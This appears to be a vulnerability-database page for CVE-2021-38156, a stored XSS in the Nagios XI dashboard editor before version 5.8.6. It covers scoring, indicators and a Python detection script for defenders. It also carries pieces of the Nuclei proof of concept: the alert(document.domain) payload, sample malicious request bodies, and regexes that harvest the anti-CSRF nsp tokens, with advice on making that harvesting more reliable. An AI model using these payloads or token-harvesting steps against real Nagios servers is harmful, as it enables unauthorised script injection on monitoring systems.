CVE-2021-38156
Published 2021-09-15
In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.
Priority: P3 (50), medium, 5.4 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Exploit: available (Nuclei template indexed below)
EPSS: 88.94% (99.8th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | < 5.8.6 | 5.8.6 |
Detection & IOCs (extracted from sources)
- URL: /nagiosxi/dashboards/manage.php
- Command (tail of the dashboard-edit POST body): alert(document.domain)&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}}
- Detect an exploitation attempt by matching the string 'data-title="">alert(document.domain)' in the HTTP response body of /nagiosxi/dashboards/manage.php. That literal is the Nuclei PoC's own payload breaking out of the dashboard's data-title attribute; a rule meant to catch more than the PoC should look for any tag, event handler or javascript: URL rendered into that attribute.
- The attack targets the dashboard edit functionality: monitor POST requests to /nagiosxi/dashboards/manage.php whose title or background parameter carries markup, submitted together with the nsp token.
- Exploitation requires authentication as an administrative user. The XSS is stored: the Nuclei template submits the payload as the dashboard title and then matches it in a later GET of manage.php, i.e. it is rendered back unescaped when the dashboard is edited. The nsp anti-CSRF token must be harvested from the page before the POST is submitted, so the request cannot simply be forged cross-origin.
- Fixed in Nagios XI 5.8.6 and later; scope detection rules to versions before 5.8.6.
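The rules above as runnable detection logic. This is an added example written for this page, not the Nuclei template's or Nagios's code. It assumes the request log has already been parsed into (method, path, body) tuples (the sample requests below are constructed), that the Nagios XI version is known from inventory, and it generalises the PoC's literal alert(document.domain) to any tag, inline event handler or javascript: URL in the title or background parameter. The markup heuristic is this example's own, not a rule from the source.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Path and parameters named in the IOC section; fixed version from the advisory.
TARGET_PATH = "/nagiosxi/dashboards/manage.php"
WATCHED_PARAMS = ("title", "background")
FIXED_VERSION = (5, 8, 6)

# Assumed heuristic: a tag start, an inline event handler, or a javascript: URL.
# \b before "on" avoids tripping on words like "Monitoring=".
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def parse_version(version):
    """'5.8.5' -> (5, 8, 5); tolerates a trailing suffix such as '5.8.5-1'."""
    return tuple(int(p) for p in re.match(r"(\d+)\.(\d+)\.(\d+)", version).groups())


def is_affected(version):
    """True for every Nagios XI release before the 5.8.6 fix."""
    return parse_version(version) < FIXED_VERSION


def inspect_post(method, path, body, version=None):
    """Return (param, decoded_value) pairs that look like XSS in a dashboard-edit
    POST, or [] for any other request or for a host already on >= 5.8.6."""
    if method != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return []
    if version is not None and not is_affected(version):
        return []
    params = parse_qs(body, keep_blank_values=True)  # decodes once
    hits = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            decoded = unquote_plus(value)  # second pass catches double-encoding
            if MARKUP_RE.search(decoded):
                hits.append((name, decoded))
    return hits


def scan(requests, version=None):
    """Index every request in `requests` that trips the rule."""
    flagged = []
    for i, (method, path, body) in enumerate(requests):
        hits = inspect_post(method, path, body, version)
        if hits:
            flagged.append((i, hits))
    return flagged


# Constructed sample requests (not real traffic); nsp values are made up.
SAMPLE_REQUESTS = [
    ("POST", TARGET_PATH,
     "title=Nagios+XI+%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
     "&background=&transparent=0&submitButton=Submit&nsp=deadbeef"),
    ("POST", TARGET_PATH,
     "title=Ops+overview&background=%23ffffff&transparent=0&submitButton=Submit&nsp=deadbeef"),
    ("POST", TARGET_PATH,
     "title=x&background=url(javascript%3Aalert(1))&transparent=0&submitButton=Submit&nsp=deadbeef"),
    ("GET", TARGET_PATH, ""),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS, version="5.8.5"):
        print(f"request {index}: {hits}")
```

Requests 0 and 2 are flagged on a 5.8.5 host (script tag in title, javascript: URL in background); the benign edit and the GET are not, and nothing is flagged once the version gate says 5.8.6 or later.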
CVSS provenance
- NVD, CVSS v3.1: 5.4 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- NVD, CVSS v2.0: 3.5 LOW, AV:N/AC:M/Au:S/C:N/I:P/A:N
No detection rules found.
Nuclei
Nagios XI < 5.8.6 - Cross-Site Scripting (nuclei, CVSS 5.4)
CVE-2021-38156 [MEDIUM] Nagios XI < 5.8.6 - Cross-Site Scripting

Excerpt of the template. The indexed text carries only the tail of the dashboard-edit POST body (the title value "Nagios XI" followed by the alert(document.domain) payload; the tag wrapping the payload does not appear in the text as indexed), followed by the final GET of manage.php with its matchers and extractors. body_5 and header_5 address the fifth response of the template's request chain, i.e. the response to that GET, so the word matcher fires on the stored payload breaking out of the dashboard's data-title attribute. The two extractors are marked internal: nsp is harvested from the login page and nsp_auth from the authenticated page, and both are only used to fill the later requests.

POST body tail:

Nagios XI alert(document.domain)&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}}

```yaml
      - |
        GET /nagiosxi/dashboards/manage.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body_5
        words:
          - 'data-title="">alert(document.domain)'

      - type: word
        part: header_5
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nsp
        part: body
        group: 1
        regex:
          - "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
        internal: true

      - type: regex
        name: nsp_auth
        part: body
        group: 1
        regex:
          - "var nsp_str = ['\"](.*)['\"];"
        internal: true
# digest: 4a0a0047304502203b735df3e5a78722406b4f8bff7c34f016806533736ed5f3efbcce2a556ab751022100b7b1173a3dcdad6b7cf5b905b1fcdde0ae600b722ce29c489668432ffcca4c7a:922c64590222798bb76
```
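How the template's two extractors recover the nsp tokens, as an added example written for this page (not code from the template or from Nagios). The page fragments are constructed and the token values are made up. The tightened patterns are an assumed variant of the template's regexes, included because the template's greedy (.*) over-captures whenever another quoted attribute follows the token on the same line, which would silently feed a broken nsp into the later requests.

```python
import re

# The two extractor patterns from the Nuclei template, verbatim.
NSP_LOGIN_RE = re.compile(r"name=['\"]nsp['\"] value=['\"](.*)['\"]>")
NSP_AUTH_RE = re.compile(r"var nsp_str = ['\"](.*)['\"];")

# Assumed tightening (not from the template): stop at the first closing quote.
NSP_LOGIN_RE_TIGHT = re.compile(r"name=['\"]nsp['\"] value=['\"]([^'\"]*)['\"]>")
NSP_AUTH_RE_TIGHT = re.compile(r"var nsp_str = ['\"]([^'\"]*)['\"];")


def extract(pattern, html):
    """Group 1 of the first match, as a Nuclei regex extractor with group: 1
    would return it, or None when the page does not carry the token."""
    match = pattern.search(html)
    return match.group(1) if match else None


def harvest(login_html, auth_html, tight=False):
    """Harvest both tokens the way the template's two extractors do."""
    login_re = NSP_LOGIN_RE_TIGHT if tight else NSP_LOGIN_RE
    auth_re = NSP_AUTH_RE_TIGHT if tight else NSP_AUTH_RE
    return {"nsp": extract(login_re, login_html),
            "nsp_auth": extract(auth_re, auth_html)}


# Constructed page fragments; the token values are made up.
LOGIN_PAGE = '<input type="hidden" name="nsp" value="a1b2c3d4e5f6">'
AUTH_PAGE = "<script>\nvar nsp_str = 'f6e5d4c3b2a1';\n</script>"
# Constructed trap: a second quoted attribute on the same line. The greedy
# (.*) runs to the last quote-and-bracket, swallowing the following input tag.
LOGIN_PAGE_TRAP = ('<input type="hidden" name="nsp" value="a1b2c3d4e5f6">'
                   '<input type="hidden" name="page" value="auth">')

if __name__ == "__main__":
    print(harvest(LOGIN_PAGE, AUTH_PAGE))
    print("greedy on trap:", extract(NSP_LOGIN_RE, LOGIN_PAGE_TRAP))
    print("tight on trap: ", extract(NSP_LOGIN_RE_TIGHT, LOGIN_PAGE_TRAP))
```

On the plain fragments both forms agree; on the trap line the template's pattern returns the token plus the whole next input tag, while the tightened pattern returns just the token. Nuclei's Go regex engine, like Python's, does not let . cross a newline, so the over-capture only bites when the extra attribute shares the token's line.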
No writeups or analysis indexed.